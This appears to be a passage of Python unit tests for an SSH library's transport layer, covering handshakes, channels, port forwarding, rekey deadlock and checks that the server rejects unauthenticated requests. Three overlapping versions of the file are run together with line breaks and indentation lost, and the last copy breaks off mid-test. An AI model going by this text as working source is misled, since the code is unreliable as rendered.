self.watchdog_event = threading.Event() def run(self): try: while not self.done_event.is_set(): if self.chan.recv_ready(): chan.recv(65536) self.watchdog_event.set() else: if random.randint(0, 1): time.sleep(random.randint(0, 500) / 1000.0) finally: self.done_event.set() self.watchdog_event.set() self.setup_test_server() self.ts.packetizer.REKEY_BYTES = 2048 chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) # Monkey patch the client's Transport._handler_table so that the client # sends MSG_CHANNEL_WINDOW_ADJUST whenever it receives an initial # MSG_KEXINIT. This is used to simulate the effect of network latency # on a real MSG_CHANNEL_WINDOW_ADJUST message. self.tc._handler_table = ( self.tc._handler_table.copy() ) # copy per-class dictionary _negotiate_keys = self.tc._handler_table[MSG_KEXINIT] def _negotiate_keys_wrapper(self, m): if self.local_kex_init is None: # Remote side sent KEXINIT # Simulate in-transit MSG_CHANNEL_WINDOW_ADJUST by sending it # before responding to the incoming MSG_KEXINIT. m2 = Message() m2.add_byte(cMSG_CHANNEL_WINDOW_ADJUST) m2.add_int(chan.remote_chanid) m2.add_int(1) # bytes to add self._send_message(m2) return _negotiate_keys(self, m) self.tc._handler_table[MSG_KEXINIT] = _negotiate_keys_wrapper # Parameters for the test iterations = 500 # The deadlock does not happen every time, but it # should after many iterations. timeout = 5 # This event is set when the test is completed done_event = threading.Event() # Start the sending thread st = SendThread(schan, iterations, done_event) st.start() # Start the receiving thread rt = ReceiveThread(chan, done_event) rt.start() # Act as a watchdog timer, checking deadlocked = False while not deadlocked and not done_event.is_set(): for event in (st.watchdog_event, rt.watchdog_event): event.wait(timeout) if done_event.is_set(): break if not event.is_set(): deadlocked = True break event.clear() # Tell the threads to stop (if they haven't already stopped). Note # that if one or more threads are deadlocked, they might hang around # forever (until the process exits). done_event.set() # Assertion: We must not have detected a timeout. self.assertFalse(deadlocked) # Close the channels schan.close() chan.close() def test_sanitze_packet_size(self): """ verify that we conform to the rfc of packet and window sizes. """ for val, correct in [ (4095, MIN_PACKET_SIZE), (None, DEFAULT_MAX_PACKET_SIZE), (2 ** 32, MAX_WINDOW_SIZE), ]: self.assertEqual(self.tc._sanitize_packet_size(val), correct) def test_sanitze_window_size(self): """ verify that we conform to the rfc of packet and window sizes. """ for val, correct in [ (32767, MIN_WINDOW_SIZE), (None, DEFAULT_WINDOW_SIZE), (2 ** 32, MAX_WINDOW_SIZE), ]: self.assertEqual(self.tc._sanitize_window_size(val), correct) @slow def test_handshake_timeout(self): """ verify that we can get a hanshake timeout. """ # Tweak client Transport instance's Packetizer instance so # its read_message() sleeps a bit. This helps prevent race conditions # where the client Transport's timeout timer thread doesn't even have # time to get scheduled before the main client thread finishes # handshaking with the server. # (Doing this on the server's transport *sounds* more 'correct' but # actually doesn't work nearly as well for whatever reason.) class SlowPacketizer(Packetizer): def read_message(self): time.sleep(1) return super(SlowPacketizer, self).read_message() # NOTE: prettttty sure since the replaced .packetizer Packetizer is now # no longer doing anything with its copy of the socket...everything'll # be fine. Even tho it's a bit squicky. self.tc.packetizer = SlowPacketizer(self.tc.sock) # Continue with regular test red tape. host_key = RSAKey.from_private_key_file(_support("test_rsa.key")) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.tc.handshake_timeout = 0.000000000001 self.ts.start_server(event, server) self.assertRaises( EOFError, self.tc.connect, hostkey=public_host_key, username="******", password="******", ) def test_select_after_close(self): """ verify that select works when a channel is already closed. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) schan.close() # give client a moment to receive close notification time.sleep(0.1) r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) def test_channel_send_misc(self): """ verify behaviours sending various instances to a channel """ self.setup_test_server() text = u"\xa7 slice me nicely" with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # TypeError raised on non string or buffer type self.assertRaises(TypeError, chan.send, object()) self.assertRaises(TypeError, chan.sendall, object()) # sendall() accepts a unicode instance chan.sendall(text) expected = text.encode("utf-8") self.assertEqual(sfile.read(len(expected)), expected) @needs_builtin("buffer") def test_channel_send_buffer(self): """ verify sending buffer instances to a channel """ self.setup_test_server() data = 3 * b"some test data\n whole" with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # send() accepts buffer instances sent = 0 while sent < len(data): sent += chan.send(buffer(data, sent, 8)) # noqa self.assertEqual(sfile.read(len(data)), data) # sendall() accepts a buffer instance chan.sendall(buffer(data)) # noqa self.assertEqual(sfile.read(len(data)), data) @needs_builtin("memoryview") def test_channel_send_memoryview(self): """ verify sending memoryview instances to a channel """ self.setup_test_server() data = 3 * b"some test data\n whole" with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # send() accepts memoryview slices sent = 0 view = memoryview(data) while sent < len(view): sent += chan.send(view[sent : sent + 8]) self.assertEqual(sfile.read(len(data)), data) # sendall() accepts a memoryview instance chan.sendall(memoryview(data)) self.assertEqual(sfile.read(len(data)), data) def test_server_rejects_open_channel_without_auth(self): try: self.setup_test_server(connect_kwargs={}) self.tc.open_session() except ChannelException as e: assert e.code == OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED else: assert False, "Did not raise ChannelException!" def test_server_rejects_arbitrary_global_request_without_auth(self): self.setup_test_server(connect_kwargs={}) # NOTE: this dummy global request kind would normally pass muster # from the test server. self.tc.global_request("acceptable") # Global requests never raise exceptions, even on failure (not sure why # this was the original design...ugh.) Best we can do to tell failure # happened is that the client transport's global_response was set back # to None; if it had succeeded, it would be the response Message. err = "Unauthed global response incorrectly succeeded!" assert self.tc.global_response is None, err def test_server_rejects_port_forward_without_auth(self): # NOTE: at protocol level port forward requests are treated same as a # regular global request, but Paramiko server implements a special-case # method for it, so it gets its own test. (plus, THAT actually raises # an exception on the client side, unlike the general case...) self.setup_test_server(connect_kwargs={}) try: self.tc.request_port_forward("localhost", 1234) except SSHException as e: assert "forwarding request denied" in str(e) else: assert False, "Did not raise SSHException!" def _send_unimplemented(self, server_is_sender): self.setup_test_server() sender, recipient = self.tc, self.ts if server_is_sender: sender, recipient = self.ts, self.tc recipient._send_message = Mock() msg = Message() msg.add_byte(cMSG_UNIMPLEMENTED) sender._send_message(msg) # TODO: I hate this but I literally don't see a good way to know when # the recipient has received the sender's message (there are no # existing threading events in play that work for this), esp in this # case where we don't WANT a response (as otherwise we could # potentially try blocking on the sender's receipt of a reply...maybe). time.sleep(0.1) assert not recipient._send_message.called def test_server_does_not_respond_to_MSG_UNIMPLEMENTED(self): self._send_unimplemented(server_is_sender=False) def test_client_does_not_respond_to_MSG_UNIMPLEMENTED(self): self._send_unimplemented(server_is_sender=True) def _send_client_message(self, message_type): self.setup_test_server(connect_kwargs={}) self.ts._send_message = Mock() # NOTE: this isn't 100% realistic (most of these message types would # have actual other fields in 'em) but it suffices to test the level of # message dispatch we're interested in here. msg = Message() # TODO: really not liking the whole cMSG_XXX vs MSG_XXX duality right # now, esp since the former is almost always just byte_chr(the # latter)...but since that's the case... msg.add_byte(byte_chr(message_type)) self.tc._send_message(msg) # No good way to actually wait for server action (see above tests re: # MSG_UNIMPLEMENTED). Grump. time.sleep(0.1) def _expect_unimplemented(self): # Ensure MSG_UNIMPLEMENTED was sent (implies it hit end of loop instead # of truly handling the given message). # NOTE: When bug present, this will actually be the first thing that # fails (since in many cases actual message handling doesn't involve # sending a message back right away). assert self.ts._send_message.call_count == 1 reply = self.ts._send_message.call_args[0][0] reply.rewind() # Because it's pre-send, not post-receive assert reply.get_byte() == cMSG_UNIMPLEMENTED def test_server_transports_reject_client_message_types(self): # TODO: handle Transport's own tables too, not just its inner auth # handler's table. See TODOs in auth_handler.py for message_type in AuthHandler._client_handler_table: self._send_client_message(message_type) self._expect_unimplemented() # Reset for rest of loop self.tearDown() self.setUp() def test_server_rejects_client_MSG_USERAUTH_SUCCESS(self): self._send_client_message(MSG_USERAUTH_SUCCESS) # Sanity checks assert not self.ts.authenticated assert not self.ts.auth_handler.authenticated # Real fix's behavior self._expect_unimplemented()
class TransportTest(unittest.TestCase): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server(self, client_options=None, server_options=None): host_key = RSAKey.from_private_key_file(test_path('test_rsa.key')) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) if client_options is not None: client_options(self.tc.get_security_options()) if server_options is not None: server_options(self.ts.get_security_options()) event = threading.Event() self.server = NullServer() self.assertTrue(not event.is_set()) self.ts.start_server(event, self.server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) def test_1_security_options(self): o = self.tc.get_security_options() self.assertEqual(type(o), SecurityOptions) self.assertTrue(('aes256-cbc', 'blowfish-cbc') != o.ciphers) o.ciphers = ('aes256-cbc', 'blowfish-cbc') self.assertEqual(('aes256-cbc', 'blowfish-cbc'), o.ciphers) try: o.ciphers = ('aes256-cbc', 'made-up-cipher') self.assertTrue(False) except ValueError: pass try: o.ciphers = 23 self.assertTrue(False) except TypeError: pass def test_2_compute_key(self): self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929 self.tc.H = b'\x0C\x83\x07\xCD\xE6\x85\x6F\xF3\x0B\xA9\x36\x84\xEB\x0F\x04\xC2\x52\x0E\x9E\xD3' self.tc.session_id = self.tc.H key = self.tc._compute_key('C', 32) self.assertEqual( b'207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995', hexlify(key).upper()) def test_3_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file(test_path('test_rsa.key')) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.assertEqual(None, self.tc.get_username()) self.assertEqual(None, self.ts.get_username()) self.assertEqual(False, self.tc.is_authenticated()) self.assertEqual(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) self.assertEqual('slowdive', self.tc.get_username()) self.assertEqual('slowdive', self.ts.get_username()) self.assertEqual(True, self.tc.is_authenticated()) self.assertEqual(True, self.ts.is_authenticated()) def test_3a_long_banner(self): """ verify that a long banner doesn't mess up the handshake. """ host_key = RSAKey.from_private_key_file(test_path('test_rsa.key')) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.socks.send(LONG_BANNER) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) def test_4_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ def force_algorithms(options): options.ciphers = ('aes256-cbc', ) options.digests = ('hmac-md5-96', ) self.setup_test_server(client_options=force_algorithms) self.assertEqual('aes256-cbc', self.tc.local_cipher) self.assertEqual('aes256-cbc', self.tc.remote_cipher) self.assertEqual(12, self.tc.packetizer.get_mac_size_out()) self.assertEqual(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) def test_5_keepalive(self): """ verify that the keepalive will be sent. """ self.setup_test_server() self.assertEqual(None, getattr(self.server, '_global_request', None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEqual('*****@*****.**', self.server._global_request) def test_6_exec_command(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command('no') self.assertTrue(False) except SSHException: pass chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() f = chan.makefile() self.assertEqual('Hello there.\n', f.readline()) self.assertEqual('', f.readline()) f = chan.makefile_stderr() self.assertEqual('This is on stderr.\n', f.readline()) self.assertEqual('', f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() chan.set_combine_stderr(True) f = chan.makefile() self.assertEqual('Hello there.\n', f.readline()) self.assertEqual('This is on stderr.\n', f.readline()) self.assertEqual('', f.readline()) def test_6a_channel_can_be_used_as_context_manager(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() with self.tc.open_session() as chan: with self.ts.accept(1.0) as schan: chan.exec_command('yes') schan.send('Hello there.\n') schan.close() f = chan.makefile() self.assertEqual('Hello there.\n', f.readline()) self.assertEqual('', f.readline()) def test_7_invoke_shell(self): """ verify that invoke_shell() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) chan.send('communist j. cat\n') f = schan.makefile() self.assertEqual('communist j. cat\n', f.readline()) chan.close() self.assertEqual('', f.readline()) def test_8_channel_exception(self): """ verify that ChannelException is thrown for a bad open-channel request. """ self.setup_test_server() try: chan = self.tc.open_channel('bogus') self.fail('expected exception') except ChannelException as e: self.assertTrue(e.code == OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED) def test_9_exit_status(self): """ verify that get_exit_status() works. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) chan.exec_command('yes') schan.send('Hello there.\n') self.assertTrue(not chan.exit_status_ready()) # trigger an EOF schan.shutdown_read() schan.shutdown_write() schan.send_exit_status(23) schan.close() f = chan.makefile() self.assertEqual('Hello there.\n', f.readline()) self.assertEqual('', f.readline()) count = 0 while not chan.exit_status_ready(): time.sleep(0.1) count += 1 if count > 50: raise Exception("timeout") self.assertEqual(23, chan.recv_exit_status()) chan.close() def test_A_select(self): """ verify that select() on a channel works. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.send('hello\n') # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(b'hello\n', chan.recv(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.close() # detect eof? for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(bytes(), chan.recv(16)) # make sure the pipe is still open for now... p = chan._pipe self.assertEqual(False, p._closed) chan.close() # ...and now is closed. self.assertEqual(True, p._closed) def test_B_renegotiate(self): """ verify that a transport can correctly renegotiate mid-stream. """ self.setup_test_server() self.tc.packetizer.REKEY_BYTES = 16384 chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) self.assertEqual(self.tc.H, self.tc.session_id) for i in range(20): chan.send('x' * 1024) chan.close() # allow a few seconds for the rekeying to complete for i in range(50): if self.tc.H != self.tc.session_id: break time.sleep(0.1) self.assertNotEqual(self.tc.H, self.tc.session_id) schan.close() def test_C_compression(self): """ verify that zlib compression is basically working. """ def force_compression(o): o.compression = ('zlib', ) self.setup_test_server(force_compression, force_compression) chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) bytes = self.tc.packetizer._Packetizer__sent_bytes chan.send('x' * 1024) bytes2 = self.tc.packetizer._Packetizer__sent_bytes # tests show this is actually compressed to *52 bytes*! including packet overhead! nice!! :) self.assertTrue(bytes2 - bytes < 1024) self.assertEqual(52, bytes2 - bytes) chan.close() schan.close() def test_D_x11(self): """ verify that an x11 port can be requested and opened. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) requested = [] def handler(c, addr_port): addr, port = addr_port requested.append((addr, port)) self.tc._queue_incoming_channel(c) self.assertEqual(None, getattr(self.server, '_x11_screen_number', None)) cookie = chan.request_x11(0, single_connection=True, handler=handler) self.assertEqual(0, self.server._x11_screen_number) self.assertEqual('MIT-MAGIC-COOKIE-1', self.server._x11_auth_protocol) self.assertEqual(cookie, self.server._x11_auth_cookie) self.assertEqual(True, self.server._x11_single_connection) x11_server = self.ts.open_x11_channel(('localhost', 6093)) x11_client = self.tc.accept() self.assertEqual('localhost', requested[0][0]) self.assertEqual(6093, requested[0][1]) x11_server.send('hello') self.assertEqual(b'hello', x11_client.recv(5)) x11_server.close() x11_client.close() chan.close() schan.close() def test_E_reverse_port_forwarding(self): """ verify that a client can ask the server to open a reverse port for forwarding. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) requested = [] def handler(c, origin_addr_port, server_addr_port): requested.append(origin_addr_port) requested.append(server_addr_port) self.tc._queue_incoming_channel(c) port = self.tc.request_port_forward('127.0.0.1', 0, handler) self.assertEqual(port, self.server._listen.getsockname()[1]) cs = socket.socket() cs.connect(('127.0.0.1', port)) ss, _ = self.server._listen.accept() sch = self.ts.open_forwarded_tcpip_channel(ss.getsockname(), ss.getpeername()) cch = self.tc.accept() sch.send('hello') self.assertEqual(b'hello', cch.recv(5)) sch.close() cch.close() ss.close() cs.close() # now cancel it. self.tc.cancel_port_forward('127.0.0.1', port) self.assertTrue(self.server._listen is None) def test_F_port_forwarding(self): """ verify that a client can forward new connections from a locally- forwarded port. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) # open a port on the "server" that the client will ask to forward to. greeting_server = socket.socket() greeting_server.bind(('127.0.0.1', 0)) greeting_server.listen(1) greeting_port = greeting_server.getsockname()[1] cs = self.tc.open_channel('direct-tcpip', ('127.0.0.1', greeting_port), ('', 9000)) sch = self.ts.accept(1.0) cch = socket.socket() cch.connect(self.server._tcpip_dest) ss, _ = greeting_server.accept() ss.send(b'Hello!\n') ss.close() sch.send(cch.recv(8192)) sch.close() self.assertEqual(b'Hello!\n', cs.recv(7)) cs.close() def test_G_stderr_select(self): """ verify that select() on a channel works even if only stderr is receiving data. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.send_stderr('hello\n') # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(b'hello\n', chan.recv_stderr(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.close() chan.close() def test_H_send_ready(self): """ verify that send_ready() indicates when a send would not block. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) self.assertEqual(chan.send_ready(), True) total = 0 K = '*' * 1024 limit = 1 + (64 * 2**15) while total < limit: chan.send(K) total += len(K) if not chan.send_ready(): break self.assertTrue(total < limit) schan.close() chan.close() self.assertEqual(chan.send_ready(), True) def test_I_rekey_deadlock(self): """ Regression test for deadlock when in-transit messages are received after MSG_KEXINIT is sent Note: When this test fails, it may leak threads. """ # Test for an obscure deadlocking bug that can occur if we receive # certain messages while initiating a key exchange. # # The deadlock occurs as follows: # # In the main thread: # 1. The user's program calls Channel.send(), which sends # MSG_CHANNEL_DATA to the remote host. # 2. Packetizer discovers that REKEY_BYTES has been exceeded, and # sets the __need_rekey flag. # # In the Transport thread: # 3. Packetizer notices that the __need_rekey flag is set, and raises # NeedRekeyException. # 4. In response to NeedRekeyException, the transport thread sends # MSG_KEXINIT to the remote host. # # On the remote host (using any SSH implementation): # 5. The MSG_CHANNEL_DATA is received, and MSG_CHANNEL_WINDOW_ADJUST is sent. # 6. The MSG_KEXINIT is received, and a corresponding MSG_KEXINIT is sent. # # In the main thread: # 7. The user's program calls Channel.send(). # 8. Channel.send acquires Channel.lock, then calls Transport._send_user_message(). # 9. Transport._send_user_message waits for Transport.clear_to_send # to be set (i.e., it waits for re-keying to complete). # Channel.lock is still held. # # In the Transport thread: # 10. MSG_CHANNEL_WINDOW_ADJUST is received; Channel._window_adjust # is called to handle it. # 11. Channel._window_adjust tries to acquire Channel.lock, but it # blocks because the lock is already held by the main thread. # # The result is that the Transport thread never processes the remote # host's MSG_KEXINIT packet, because it becomes deadlocked while # handling the preceding MSG_CHANNEL_WINDOW_ADJUST message. # We set up two separate threads for sending and receiving packets, # while the main thread acts as a watchdog timer. If the timer # expires, a deadlock is assumed. class SendThread(threading.Thread): def __init__(self, chan, iterations, done_event): threading.Thread.__init__(self, None, None, self.__class__.__name__) self.setDaemon(True) self.chan = chan self.iterations = iterations self.done_event = done_event self.watchdog_event = threading.Event() self.last = None def run(self): try: for i in range(1, 1 + self.iterations): if self.done_event.is_set(): break self.watchdog_event.set() #print i, "SEND" self.chan.send("x" * 2048) finally: self.done_event.set() self.watchdog_event.set() class ReceiveThread(threading.Thread): def __init__(self, chan, done_event): threading.Thread.__init__(self, None, None, self.__class__.__name__) self.setDaemon(True) self.chan = chan self.done_event = done_event self.watchdog_event = threading.Event() def run(self): try: while not self.done_event.is_set(): if self.chan.recv_ready(): chan.recv(65536) self.watchdog_event.set() else: if random.randint(0, 1): time.sleep(random.randint(0, 500) / 1000.0) finally: self.done_event.set() self.watchdog_event.set() self.setup_test_server() self.ts.packetizer.REKEY_BYTES = 2048 chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) # Monkey patch the client's Transport._handler_table so that the client # sends MSG_CHANNEL_WINDOW_ADJUST whenever it receives an initial # MSG_KEXINIT. This is used to simulate the effect of network latency # on a real MSG_CHANNEL_WINDOW_ADJUST message. self.tc._handler_table = self.tc._handler_table.copy( ) # copy per-class dictionary _negotiate_keys = self.tc._handler_table[MSG_KEXINIT] def _negotiate_keys_wrapper(self, m): if self.local_kex_init is None: # Remote side sent KEXINIT # Simulate in-transit MSG_CHANNEL_WINDOW_ADJUST by sending it # before responding to the incoming MSG_KEXINIT. m2 = Message() m2.add_byte(cMSG_CHANNEL_WINDOW_ADJUST) m2.add_int(chan.remote_chanid) m2.add_int(1) # bytes to add self._send_message(m2) return _negotiate_keys(self, m) self.tc._handler_table[MSG_KEXINIT] = _negotiate_keys_wrapper # Parameters for the test iterations = 500 # The deadlock does not happen every time, but it # should after many iterations. timeout = 5 # This event is set when the test is completed done_event = threading.Event() # Start the sending thread st = SendThread(schan, iterations, done_event) st.start() # Start the receiving thread rt = ReceiveThread(chan, done_event) rt.start() # Act as a watchdog timer, checking deadlocked = False while not deadlocked and not done_event.is_set(): for event in (st.watchdog_event, rt.watchdog_event): event.wait(timeout) if done_event.is_set(): break if not event.is_set(): deadlocked = True break event.clear() # Tell the threads to stop (if they haven't already stopped). Note # that if one or more threads are deadlocked, they might hang around # forever (until the process exits). done_event.set() # Assertion: We must not have detected a timeout. self.assertFalse(deadlocked) # Close the channels schan.close() chan.close() def test_J_sanitze_packet_size(self): """ verify that we conform to the rfc of packet and window sizes. """ for val, correct in [(4095, MIN_PACKET_SIZE), (None, DEFAULT_MAX_PACKET_SIZE), (2**32, MAX_WINDOW_SIZE)]: self.assertEqual(self.tc._sanitize_packet_size(val), correct) def test_K_sanitze_window_size(self): """ verify that we conform to the rfc of packet and window sizes. """ for val, correct in [(32767, MIN_WINDOW_SIZE), (None, DEFAULT_WINDOW_SIZE), (2**32, MAX_WINDOW_SIZE)]: self.assertEqual(self.tc._sanitize_window_size(val), correct) def test_L_handshake_timeout(self): """ verify that we can get a hanshake timeout. """ host_key = RSAKey.from_private_key_file(test_path('test_rsa.key')) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.tc.handshake_timeout = 0.000000000001 self.ts.start_server(event, server) self.assertRaises(EOFError, self.tc.connect, hostkey=public_host_key, username='******', password='******')
class TransportTest(unittest.TestCase): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server( self, client_options=None, server_options=None, connect_kwargs=None, ): host_key = RSAKey.from_private_key_file(_support('test_rsa.key')) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) if client_options is not None: client_options(self.tc.get_security_options()) if server_options is not None: server_options(self.ts.get_security_options()) event = threading.Event() self.server = NullServer() self.assertTrue(not event.is_set()) self.ts.start_server(event, self.server) if connect_kwargs is None: connect_kwargs = dict( hostkey=public_host_key, username='******', password='******', ) self.tc.connect(**connect_kwargs) event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) def test_1_security_options(self): o = self.tc.get_security_options() self.assertEqual(type(o), SecurityOptions) self.assertTrue(('aes256-cbc', 'blowfish-cbc') != o.ciphers) o.ciphers = ('aes256-cbc', 'blowfish-cbc') self.assertEqual(('aes256-cbc', 'blowfish-cbc'), o.ciphers) try: o.ciphers = ('aes256-cbc', 'made-up-cipher') self.assertTrue(False) except ValueError: pass try: o.ciphers = 23 self.assertTrue(False) except TypeError: pass def test_1b_security_options_reset(self): o = self.tc.get_security_options() # should not throw any exceptions o.ciphers = o.ciphers o.digests = o.digests o.key_types = o.key_types o.kex = o.kex o.compression = o.compression def test_2_compute_key(self): self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929 self.tc.H = b'\x0C\x83\x07\xCD\xE6\x85\x6F\xF3\x0B\xA9\x36\x84\xEB\x0F\x04\xC2\x52\x0E\x9E\xD3' self.tc.session_id = self.tc.H key = self.tc._compute_key('C', 32) self.assertEqual(b'207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995', hexlify(key).upper()) def test_3_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file(_support('test_rsa.key')) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.assertEqual(None, self.tc.get_username()) self.assertEqual(None, self.ts.get_username()) self.assertEqual(False, self.tc.is_authenticated()) self.assertEqual(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) self.assertEqual('slowdive', self.tc.get_username()) self.assertEqual('slowdive', self.ts.get_username()) self.assertEqual(True, self.tc.is_authenticated()) self.assertEqual(True, self.ts.is_authenticated()) def test_3a_long_banner(self): """ verify that a long banner doesn't mess up the handshake. """ host_key = RSAKey.from_private_key_file(_support('test_rsa.key')) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.socks.send(LONG_BANNER) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) def test_4_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ def force_algorithms(options): options.ciphers = ('aes256-cbc',) options.digests = ('hmac-md5-96',) self.setup_test_server(client_options=force_algorithms) self.assertEqual('aes256-cbc', self.tc.local_cipher) self.assertEqual('aes256-cbc', self.tc.remote_cipher) self.assertEqual(12, self.tc.packetizer.get_mac_size_out()) self.assertEqual(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) @slow def test_5_keepalive(self): """ verify that the keepalive will be sent. """ self.setup_test_server() self.assertEqual(None, getattr(self.server, '_global_request', None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEqual('*****@*****.**', self.server._global_request) def test_6_exec_command(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command(b'command contains \xfc and is not a valid UTF-8 string') self.assertTrue(False) except SSHException: pass chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() f = chan.makefile() self.assertEqual('Hello there.\n', f.readline()) self.assertEqual('', f.readline()) f = chan.makefile_stderr() self.assertEqual('This is on stderr.\n', f.readline()) self.assertEqual('', f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() chan.set_combine_stderr(True) f = chan.makefile() 